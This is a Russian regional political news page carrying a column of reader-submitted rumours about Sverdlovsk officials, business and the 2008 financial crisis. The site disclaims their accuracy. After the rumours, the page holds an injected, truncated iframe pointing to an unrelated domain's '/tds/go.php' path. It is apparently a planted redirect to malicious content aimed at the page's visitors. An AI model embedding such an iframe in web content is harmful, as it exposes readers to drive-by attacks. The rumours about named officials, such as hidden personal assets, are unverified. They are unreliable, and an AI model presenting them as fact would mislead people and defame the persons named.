Слухи сайта «ПолитСовет»

Редакция сайта «ПолитСовет» не несет никакой ответственности за достоверность информации, изложенной в рубрике «Слухи и Версии». Сами слухи присылаются нам нашими читателями и содержат их точку зрения на события, происходящие в политической жизни Урала и России.
Если Вы обладаете подобной информацией, присылайте свои материалы по адресу sluhi@politsovet.ru с пометкой «Слухи и Версии».

Слухи и версии, 14 ноября

Эдуард Россель осмотрел «активы»
Говорят, что одной из основных целей поездки свердловского губернатора в Германию и Австрию якобы было знакомство с состоянием неких личных «активов». По неофициальной информации, именно этой интимностью объясняется крайне скупая информация о ходе и результатах визита.
Как уверяют слухмейкеры, из поездки губернатор вернулся повеселевшим, из чего многие даже сделали вывод о том, что лично у губернатора, несмотря ни на что, все в порядке.
Александр Левин уйдет «по-хорошему»
Говорят, что устоявший в первой схватке за кресло главного «единоросса» Свердловской области Александр Левин морально уже готов к поражению во второй. По неофициальной информации, схожей точки зрения на ситуацию придерживаются и в окружении Игоря Баринова, считающем, что в партийно-аппаратном смысле Левин не переживет предстоящего съезда партии.
Впрочем, как уверяют слухмейкеры, снимать Александра Юрьевича никто не будет. Согласно последним слухам из Москвы, он напишет заявление о сложении полномочий по собственному желанию.
Металлурги сменят ориентацию
Говорят, что назначение гендиректором ТМК Александра Ширяева может стать лишь
своего рода первой ласточкой. По неофициальной информации, сменить топ-менеджеров-
«металлургов» на «финансистов» могут собственники еще некоторых металлургических
ФПГ.
По мнению слухмейкеров, такой вариант развития событий более чем вероятен, ведь
большая часть производственных проектов заморожена, и куда важнее становится найти
на рынке финансовые ресурсы.
Свердловские министры устали, но еще не уходят
Говорят, что министры кабинета Виктора Кокшарова изрядно измотаны аппаратной борьбой за финансы на 2009 год. По неофициальной информации, в условиях жесточайшего урезания расходов и отсутствия каких-либо оснований для оптимизма ряд постов вскоре могут стать вакантными.
Тем не менее, как уверяют слухмейкеры, в уходящем году отчаянных жестов не стоит ждать ни от министров-«пенсионеров», ни от главы правительства, который, по общему мнению, в последнее время выглядит хуже всех коллег.
Бизнес готов принять «грязные» деньги
Говорят, что финансовый кризис пока мало заботит лишь влиятельные мафиозные группировки. Более того, по неофициальной информации, отчасти он даже выгоден криминалитету, воспользоваться средствами которого в условиях кризиса ликвидности от отчаяния готовы многие коммерсанты.
Как уверяют слухмейкеры, в свою очередь мафиози охотно ссужают средства в долг, но под приличные проценты и под залог бизнес-проектов, однако в условиях сворачивания банками кредитных программ малый и средний бизнес готов идти на самые кабальные условия и опасные схемы.
Вслед за сокращением заключенных станет меньше и их охранников
Говорят, что широко проанонсированный скорый выход на свободу тысяч заключенных, помимо роста преступности, приведет как минимум и еще к одному последствию. По неофициальной информации, сократят и численность сотрудников службы исполнения наказаний.
Как уверяют слухмейкеры, сами служащие к такому повороту дел готовы и уже начали присматривать себе места «на воле».
Сокращенные «белые воротнички» присматриваются к Гоа
Говорят, что массовые сокращения навели представителей сообщества «белых воротничков» на мрачные мысли о необходимости временного расставания с Родиной. По неофициальной информации, немалое число сокращенных подумывают о том, что экономическую бурю было бы лучше переждать в диких странах, где жизнь стоит на порядок дешевле и не столь много оснований для появления новых седых волос. Как уверяют слухмейкеры, все более популярной при этом среди жертв кризиса, уверенных в том, что ждать нормализации ситуации раньше лета будущего года бессмысленно, становится идея «сдать квартиру и пожить полгода в Гоа», а после начала подъема вернуться и со свежими силами ринуться на поиски работы.
<iframe src="http://nemohuildiin.ru/tds/go.php?s

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Февраль 2019    »
ПнВтСрЧтПтСбВс
 123
45678910
11121314151617
18192021222324
25262728 

Контакты